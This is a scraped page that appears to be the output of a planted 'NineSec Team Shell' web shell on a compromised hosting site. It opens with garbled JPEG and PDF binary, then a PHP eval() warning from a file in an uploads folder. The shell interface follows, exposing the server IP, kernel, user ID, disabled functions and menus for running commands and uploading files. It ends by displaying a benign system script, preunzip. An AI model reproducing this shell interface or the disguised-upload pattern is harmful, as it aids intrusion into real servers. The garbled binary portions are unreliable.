JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C     C   ,, }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?5 (3@ @q@ =hh1 ҀĜPqހi ( í ( ((h (Pnu(9@ h'h*.Yv-dž|;*$ ߓR3ۼ EJ޸nQ֝/V}5IM񭶟w.1k' Ziwm{lq8d?FP"Uja(åP@f1@P@`PP@1@3@7$p9 ƵwLP,RJK3>?Y>:K%αJ+a~2~uk2mi`0ԴP4[f&♑ чM%)tE%[I#OҀ?C>|V -k ״-% P2SEu7 4bZ( ( ( (f%]{eLi Ff|wg'~C?ďOPi|OIgHG'ޗqS_LA48J؉(@=WR 5[gWZ3\Ì2q!r7lWW6v?|<1ʰj.kehcG**׭Qݶ~rN\R{ݍCI RnPPuM'US9B/K xĹ{:Z,Dў]lY>x'9kށ!H>St+ڡUgOEǕhyIlMc")>V?Ҿ ƯwuL<Lm|75c߈jEFn7?b}~_qP}BH PpCp( ( (PFhP7JwPMq<Qww`T IpNmC .VG\wxSіr<Ϯ=hw?.;˽r[˻.$1w$Iғ՛ƛQP$_v_q7xtu?R2,Oj īgns3r{~ƶ!=|1r6'z/3eIrSANN7MEdVPXP@Q wdj jV'-*]na[^ }jE36h#efHViUrL~l{zsxGoW z-RyLY\ÚCn$]jZVhuRH7hc5j%m>^Z̍m~ѳas :TQyxL-LeUFßxZ.e{fyn]XetcFv*9,{_-δsujQ8|XFx_J;D~P~^'[V?&|K˲(Qq?5mFǀTidxz*~YWļV}6t ;]d6t'K\V=n2کU좸,\γH;mjW?j_YY'K!(P@P@Sn+ln漮cxv^,ZJ̇=c׊JwI˛>ַi|Xv WxlDqqN,%r\FMtq?3c_yn ʩX''>1H >ճ-$?t= ;Z^EBDai~PPb  ('ozq8a>޴ /\ʹ-/kोĘ|*|JԼW;/Yv {_8hݭO"vsU3j7سO/qs1=8i[9'zҖ32<qtD z_-; eFzfW E (&scyz#>w:UTP@P@9>} j-o|ΐʦD<2Ez.yT%+ItfO|%o )U3 >>ea#xqWg.Kkt&U(ن]ZT*S?F?U~w[Bǖ$%zw^ǖg ahث@P@ '4Ҁ+th@2h(׍>I%۽1GO<RE'Wk]Zb-mmn >I˨|!?ޠu+Hǘ_={8~ 1KZ>=Rm{ ._˂%OP.ZfY!:E|O]xVY ÝħQҿNa!?8y:u/x-iF;RrDK<2Emus+H4XC(_R6̧,aJ6D~򻾡H( ( ( PqUvcW|JѮ#}m̾YN?8%2;t|VAl`!yU%1ib.݃jոP.QWJ~ơ [Zmye+[^[JG4d}MJGsG?IAJ|uC=7nYF$ǣ)#pq@4P@b (4Q4_N4MoB:Cϔ3F}2r߀G?-=2\mRLBƼ9301pnϩt /0X@$K#@x[+OB1B qLrz~H|S=檰2\J$?(ךǙ"'n$<μlއxx{,5Q!Iq޿-I4waB5(5)+@ܒYM=4 GpRzP.dP@PA-]-FxUdJ7!~) 8o {[Q>wU%$~WUrm:v=N<(6ԯ+J =ZG4),LWSAV?\e%hO߳|Jyv`S9+q  ܕ1åP@쳯m/']{k)˜"3N9%֢R勗ceZ)En}Mh+O,;H~WW]A5flӎN+}fh*|dj_/ʗ*pջYx5?$R0'?ֿ1_W=MU4/0!VM}W<1_sişO55'jm|Mڥy|<ykxO77u mOg'xmt}@NkܛlCp:QUC `ή:lJUpꏘ~"h,!dڻ o,A_s 9HZɳq6vrNE29A.}kEaMFxo7>9JF_c:ʧ)+#OVfyW~(oOvtQ<*a]uR:u5p~)Qb9KGtit\3,e7x{6*$~Fgzs|&v'[bvoϥy8G57ǝ,XW˹z|vљ[ KњC,#vt{/뇷#IUV ?Yu_CӼG;''wּڙ}j{Y +&SwGFME\aEWoQtgRr%5O}pFnWो|'rL^coUX绔,XN5F?3L| T2zPV$y&]f}^2 Rl}sƝ]7?|)RY\/yҌ:4e[^?uٟx}_V:o37;{ѧO$ǃ?}F?0r:悃<@P@̴19o)şrӄ:zgD47["}9NJI#o ja$=ο6g%f ۡƞ{-ԯcWdx93x<.\+ \3(TZ\HZ_[ #iV-ɰ J(HiZ_A&yҕWa KR[Oi zCvQ8{zJn'QQtW/ZXW(ܤ~50׽>.L쪶O.5MMZ_LMݟd^*P>,Ѧzj? ?]ƹMXs{dat & Mwrz|M˰P4o<]|f P}+Hac-OLY!ի/w8=OIYJFI=)6[fa*cN*GEŅ IayX3*ʮ!pf] gmNk]L& G?5m7|GWEjh HlWQ\(+-gܒV0kVOxoIbUg }HFP@?y@ c8F!~#_5ˠ uw gJOWqHvQ_ SA7`j ʜC[«iCsP׎?M N^WٲT*c:`QMΟ+CqD\WSN?1^nZm|&5fp@h$B1@P@"9^j Rv&6N3hˡt)Ni^HS*}j`3оx.Mo^K͕ WcFHkzkjVg;r?iQXxB>s?> ԁ*E{94k#Oh*4$-])k^_ Xz (>=fp3@k>'gVbO5zD ᫲&n/|QsRUS+:ѴUj[9+-^A32E2I"VXzQ<8fKpDєuJRLs,i*t,v>?=xwFSO͕Cil~jN}2=vuUBqzm4ψK!҂@cOZP@q@l7Zi`QWc:Ox2ŚAoי$<*\/O O8{bB}zm.+d4rǹ57,D޺|;r\4h%^X~g@yg|Umad>T|5&@E?d~N=uP@>ƀ&*\m~+bЏ@ ⛽ N Nǃ_UWt?Hi~[4rՋi+yO׷S>L1Ktb7U ,3UGopfa ۲$2 \:񏕜tw]F<MAJ_(]a@ ii\ƴyծdx6 ˪[DF^f°WbaopGR|tu+E2WI#gqа?8yCr->:Z #ִ)v5=]#Ŀ%n&Q=+TK(O|4^E:sa4rJ.Bk;3Քcgy{7dfFc|ϧt$-G#Z#(VRΌ6xʌz49}SW- ٟe= NR~8YOZ> FxA@­VKM$8WJ>4p#^7O\WuTF"+W3ўR[ص]9ˀWdнt|H*9D[޿P}-?f O  $h6{vfXA'mh (Sb$l8h E?k~bioF@9Mp&i{ZW~~7ً=1mMIJniZ1{֮GhկOjINJ>!VY'cg=pMJ9-x,WS+?GԼS+8'l1?Z&#O;nwRi8&;kG6od{; @ǣQM5C -rW# }vIU}L-ƚܸt ᕸJG߿)J0yV~-wyQ}kߍ7Irn%:vGß淂uf|EarNYzS91;\nYӬ"=QCI v瀮5qV[u-vCҁ3{_ν\>I:lj5zgo 3}ݿ_Qias| S|8yW,^T R?5Zu_evD_<Q#$9~@մLA@83@ՖErC9'Eܖm F3M[fRؐKT85ǦsۭW3Gi?~/ԴJc^v:!yoJVvE6AW0TQ3EᣅOK |5,{^s[\ /:VVp늾gZS ʰӦhלܧjceMYfu%e`q6v!)6okKxqfKGEf^('É>!֞WͲLD>\Wˡy4( ( (KpbaSԲ2C>~4$cGCP0RROTM5쮟<'ƗKTwTV;bNjұܚd=BP@P@P:o;/ԩ#_k7W.sHǟs_a{isy6ugO9>"\ÆtGea#? ld=6?IsߚP@!{P<$)@gJ_7<6"e^i_1JuZDžX9ɠ p@hvz6zB&ZC@Ne ހ@(elUZ v>=c_pX_糽Ukk#|˕Տaa*M (Erw˥)?t~`!E}In~uG?,734-ĺݎa \_^ΖByRk?-^mm6R%b{Z+x1åP@! >(4gv[|AҭDعilmo3)RAP:@P@ #oH.5N#=ԩ 1$PoOh/ x{㮟kxN2hf7uz%>W%gXm€#<|mᗏ"C <9iҭvv%UPNJkTe[9b:qKpBx0 *r85Rz3ZKvg>ȱBg>|C?О ,>MFtlW~S++i&mD uj$g2$I쏙0#xsPfp3&v„όz`3@ (ao1O\ F RIǚb~ VnM~kͥZ ?+X'(̈́zo<Ѧ=)#!^c'8]cg?h_' Yݛz|QQj}КΧ{2lUsny(֝ ʫ= ?k3X6\|9gR%pJP@ G9=+Ew$yҔ7$xE`ge}+Ƚ/U[ny||HvկumN-AՉ} }cVVGuSrݟП;Mh~ siwp s#bxlJH1Ҁ ( (nq}iX f-;Ky?Y+]h9p3>6{Q`?gMO>%t-jK WOJ0àH (2͜.xUm DSK|qV'4tu?2ֹ:Rlr5͘ҋxIǫ˚epT OT(-򫰡k2UT[_ğ'-:?}^Q˞g\{i{ˆG/+Y** UTujyKx}>*xG-VMZ[7 wǢjbN0c>B( ( F@ ZNLࣿۡYΟM@(qz(zJfkyxe|5kV[2#n, ';_1es'5/m~G ~iSiJ!3Sy|ıF,jP` qZA-@ P@P@P@&9wbcՃ}{PIx&+ ,#B#MhѨ2^0:Kր?!˝:{k$KUсA*P<0& 7 P@0u zS sbϣ }QoA޿I Yw"5,/$k nihb%cyrMYE}_ɾzx^_^ͨ<9F9fc}ҦC'#SQխw{j?mItﶶrIEڙ~h=iuVV6P4 @eP@4P@P@P@@4s@n9~S@XvGGߴl~%En@fȠƿU{W^nsvCG4gkz7FS؊]vh(h (q@ (gx)k Tr{"|''9?*җ?\6&0ӔJo^?Ѽ6..IHb!>zxL'ucs?ǙI3? ?;^Tm{`X_3cɤWm ׷X $W͹&gWe59#tp~>/1}S>+{h 1(:A}1|t8t ( ( (=( AC8A{l<@xio>Eڍ9+NA(o]x ZσxK2/^~Ccs,䲚Xg6(VA@]wo @ @1Ҁ@(9! S\ZXj-Zf5YÌyq ~k[EKhw8jH⦸y9䱯Z妬~RZs{ Kxqަ^8̇F=Llq?a=W-+Au=I5sh?(zPɠ`P@P@P@P@(# LւGdPx~~Щ,!vZӌli`ApO0?Ư$*]xVKKcdoP> ~~,΄mu񵇸$PҀc6ʀqAH^#4 R{P5;-wWih۝O` ,2|H^ӣ.'-.q>hWϳb?@1~{kbuņt[ah{hm!Hb*FT {0hc?79`@P@P@P@(h"XplPy@ZƇ5;+}BD?<+?$,-.\s>hd/@#­Mm:FdKSh?"lGwU^q@~??1|OҚ}6@jXnwQ9iMGq#/>75"Ym}4iCG/![S3War<#>[_ nBXڤ\{2hnI'P3cCH M,( ( ( 9ɠ& PrhZ:x&>B (1hZ_ (zưր@ ɠL2h$2hɠ( (+la%/$pd{(^xqqh?7_xծ4 wMSIݤ~I@Wku4CWQH c%wdPGr-{Qn6.f:[|K?^~_kiv74wMNj60&+9VX 8<(av2Rholg  AU|1 7xL>oi8@ ⿈$v?!:@$#۸"9hQ<1h߿M3Öt]5-689ڀ0\~"`A=@ƟYqA{i"{y0xDf/^E#M {p71<oF=:95'Rp3@Kᴗc=< jpߜmۻ9 O|P`tyzpq##ހ4|3zh5k-jı\NFXu@~$_ź&{5pɷvP|c?vh6d ;IRFyP|Lg~&tRG$ 8$##4w^2|gC@,53sapFu@|so&,^7Aҋ/mۻ9ܨO@]/{/uoAtT0WKl}ƀ=EipjZ>miӮ%Y#z@%xy%cfw8O ~!xdNЃU$cwZT@FCgpsq%HbksB88۷vs1@'|WGJ5kNw ds9Q xitv[u*i׉9@N(|7^@Ү/@5^}Xis_\kh#ª};߅];|Qӵ /t]SMQue.K#|rGPG}bOWbP.\W3iVHO* ZIXzljSFmNQnf/n/(2K0h?ி'g'@}47 ƿO%}jy>/C4ʝ>Y͍,9lP:unjgZ0imrc;XpA+g >$-#X |~].5>Lԭ.l36$?*/xIuA4!qk[Fz3}x_|.o(I ,ud 0 u}}s'?[_'4h:jCa'#fR&- i?q?icy?,ǗNɷ -.40)'ê͎\(7 IҮ:IU?^vmI}u@<yWu_Ȟ=5=?y.#O@HqPc+>&JKyB6r|T AƎ2WFde;-7Q 2mk~4Wm4u?ըh aA@|Kq藠/$|-[B#yI;sA[\Zu޹u PYcUAX{h+&7 >i7Z, lv?OO I~%%;tVGV0GoZ .toL֎C9 ƀ= 1ZIggLrJ$xv߳ϣ]K mVmmA?ڗJ?n <6w|y3 Yuj/y2iWW2H33q4RI:C&ou7>;&ڶ [tz.sJMv).oB= %Ǡ4Ճ~v=|V@hGo%fzc@_tW|XOK{kxG9y3E# ƀ?7?g]~a$fP/ٺ+@?+‘K'iD<"{ nq%~?Frh㕣?z7^~iT{uჵC >j3~~rê)闞]?*> ZԿeo&YiW:i5;9$2&!P~&xEׅi*XOH''ԿWORwݢq2J@׿ $K6`_ $PP@ľ>x? /@O>5x?RZkVR@x,~[,5/OsRIlN9W|BN\ d_%2aztPofvܼHܰtUxgH^4KOOI3Z/O9O*VLm+M~6y>)J3#:^?^þ[[]gYIxIB\?a~**e}wQ5Q W*̊>b8'Zៅ.گN$TJ;%MOLw="Ԓ&x`|lqO@c~l,:|7Cz}jmX2[FET\0@_?ωW#ʙ L6΀><|yH|EU#YSrM ϯo_ 3i6N%1D2:sgEmY7T1٥F`3J㏇u/w䉠Bq6m4RZU'\-tӬV;{2Yxw$bIlPwvm{=S׬#F1M8rq\_Ͽ?|Y_mkڵ捪MXpz<⻯AHy^nC,}aNY`6 ua|}mSšUrIU_k~tL6sƹg-~f>]_)43HYd ֖ Ym7'-6Rx ~\h~|n i-M mK!@ AFYfƗ <,1=p? :1 ToA1K+ uh#Qsg,Ƅf {f1Y>1V3/(?-MelbFV*@?ݐ7E{SLεѭ@ACJ > (_-X|sI|-^PJWsc>cb_s_`qXiyǗ>|>OZ#oh$P>3_<|wK<ߑ,c eRVx}Cg cYF#ݒíc? /&(x7Hrq@X-BasktML3?>$I)k?S*h(-. >@?7|C sc> t/?|_[$nD'WvP?:?mC ~?m JvN0+~ȿ΁-x5Yq}P7 n怱??Əm|c/$YN2Dp#,kcjo7u/\[ +t!ʱ `~l ,g뿅WxKZ4ˤ]>XMzwS :+āw3@|x:'j:6Cq#͟OǶ$nXuKfi_CǯxCT._˽^G_|cSE⏈iHYklP? c=gkƯbFʤFK9ց3|[ׇu|DҦ.b!R @g /?LaܙNmEϟ4П셢,/5I4-GIi`+eA#p},s5k"~#-S7-․+cC4ԀfpPHh4 4 Pq@O@PP@(1@#4.hɠ'րIsAHN 4Ps@=($w4d@n> I=hhCsAAA((1@ yL%PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357427_0_197006009.php(237) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0555) :  /usr/bin/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //usr/bin/preunzip
#!/usr/bin/sh

# Copyright (c) 2004
# Kevin Atkinson
#
# Permission to use, copy, modify, distribute and sell this software
# and its documentation for any purpose is hereby granted without
# fee, provided that the above copyright notice appear in all copies  
# and that both that copyright notice and this permission notice 
# appear in supporting documentation.  Kevin Atkinson makes no
# representations about the suitability of this software for any
# purpose.  It is provided "as is" without express or implied
# warranty.

cmd=`basename "$0"`

warn () 
{
  if test -z "$quiet"; then echo "$cmd: $1" >&2 ; fi
}

error () 
{
  echo "$cmd: $1" >&2
  errors=t
}

zip2 ()
{
  case $1 in
  d) 
    prezip-bin -d "$cmd: $2"
    ;;
  z)
    if test "$sort"
    then
      LC_COLLATE=C sort -u | prezip-bin -z "$cmd: $2"
    else
      prezip-bin -z "$cmd: $2"
    fi
    ;;
  esac
  if test $? -eq 0
  then
    return 0
  else
    errors=t
    return 1
  fi
}

zip ()
{
  if test -e "$3" -a ! "$force"
  then
    error "Output file $3 already exists."
    return 1
  fi
  zip2 $1 "$2: " < "$2" > "$3"
  if test $? -eq 0
  then
    if test -z "$keep"; then rm "$2"; fi
    return 0
  else
    rm "$3"
    return 1
  fi
}

case $cmd in
prezip)   mode=z ;;
preunzip) mode=d ;; 
precat)   mode=d; stdout=t ;;
*)        mode=h ;;
esac

num=0
for p
do
  case $p in
  --*)
    parm=`expr "x$p" : '...\(.*\)'`
    case $parm in
    decompress ) mode=d ;;
    compress   ) mode=z ;;
    keep       ) keep=t ;;
    force      ) force=t ;;
    stdout     ) stdout=t ;;
    sort       ) sort=t ;;
    nocwl      ) nocwl=t ;;
    license    ) mode=L ;;
    version    ) mode=V ;;
    help       ) mode=h ;;
    quiet      ) quiet=t ;;
    *          ) error "invalid option -- $parm";;
    esac
    ;;
  -* ) 
    p=`expr "x$p" : '..\(.*\)'`
    while test "$p"
    do
      parm=`expr "$p" : '\(.\)'`
      p=`expr "$p" : '.\(.*\)'`
      case $parm in
      d ) mode=d ;;
      z ) mode=z ;;
      k ) keep=t ;;
      f ) force=t ;;
      c ) stdout=t ;;
      s ) sort=t ;;
      S ) nocwl=t ;;
      L ) mode=L ;;
      V ) mode=V ;;
      h ) mode=h ;;
      q ) quiet=t ;;
      * ) error "invalid option -- $parm";;
      esac
    done
    ;;
  * )
    num=`expr $num + 1`
    ;;
  esac
done

if test "$errors" 
then
  mode=h
fi

case $mode in
h ) 
  prezip-bin -V
  cat <<EOF

  usage $0 [-dzhLV] [-cfksSq] [file ...]

   -h --help        display help
   -d --decompress  force decompression
   -z --compress    force compression
   -L --license     display software license
   -V --version     display version

   -c --stdout      decompress to standard output
   -f --force       force
   -k --keep        keep input files
   -s --sort        sort and remove duplicates before compressing
   -S --nocwl       do not rename .wl suffix to .cwl (use .wl.pz instead)
   -q --quiet       suppress all warnings

  If invoked as "prezip" the default action is to compress.
             as "preunzip" the default action is to decompress.
             as "precat" the default action is to decompress to stdout.

  If no file names are given then prezip will compress or decompress
  from the standard input to the standard output.  Short flags can be
  combined so that "-c -s" is the same as "-cs".

  Prezip is _not_ a general purpose compressor.  It should only be
  used on sorted word lists or other similar text files.  It will
  likely _increase_ the size of binary data.

EOF
  ;;
L )
  prezip-bin -V
  cat <<EOF

  Copyright (c) 2004
  Kevin Atkinson

  Permission to use, copy, modify, distribute and sell this software
  and its documentation for any purpose is hereby granted without
  fee, provided that the above copyright notice appear in all copies  
  and that both that copyright notice and this permission notice 
  appear in supporting documentation.  Kevin Atkinson makes no
  representations about the suitability of this software for any
  purpose.  It is provided "as is" without express or implied
  warranty.

EOF
  ;;
V ) 
  prezip-bin -V
  ;;
d | z )
if test $num -gt 0
then
  for f
  do
    case $f in
    -* ) ;;
    * )
      if test \( -f "$f" -a ! -L "$f" \) \
              -o \( \( "$stdout" -o "$force" \) -a -L "$f" \)
      then
        if test "$stdout"
        then
          zip2 $mode "$f: " < "$f"
        else
          case $mode in
          d )
            dir=`dirname "$f"`
            file=`basename "$f"`
            base=`basename "$f" .pz`
            base2=`basename "$f" .cwl`
            if test "$file" != "$base"
            then
              out="$dir/$base"
              zip d "$f" "$out"
            elif test "$file" != "$base2"
            then
              out="$dir/$base2.wl"
              zip d "$f" "$out"
            elif test "$force"
            then 
              out="$f.out"
              warn "can't guess original name - using \"$out\""
              zip d "$f" "$out"
            else
              warn "$f does not end in .pz or .cwl - ignored"
            fi
            ;;
          z )
            dir=`dirname "$f"`
            file=`basename "$f"`
            base=`basename "$f" .wl`
            if test "$nocwl" -o "$file" = "$base"
            then
              zip z "$f" "$f.pz"
            else
              zip z "$f" "$dir/$base.cwl"
            fi
            ;;
          esac
        fi
      elif test -e "$f"
      then
        warn "$f is not a regular file - ignored"
      else
        error "$f: No such file"
      fi
      ;;
    esac
  done
else
  case $mode in
  d ) zip2 d ;;
  z ) zip2 z ;;
  esac
fi
;;
esac

if test "$errors" 
then
  exit 1
else
  exit 0
fi

NineSec Team - 2022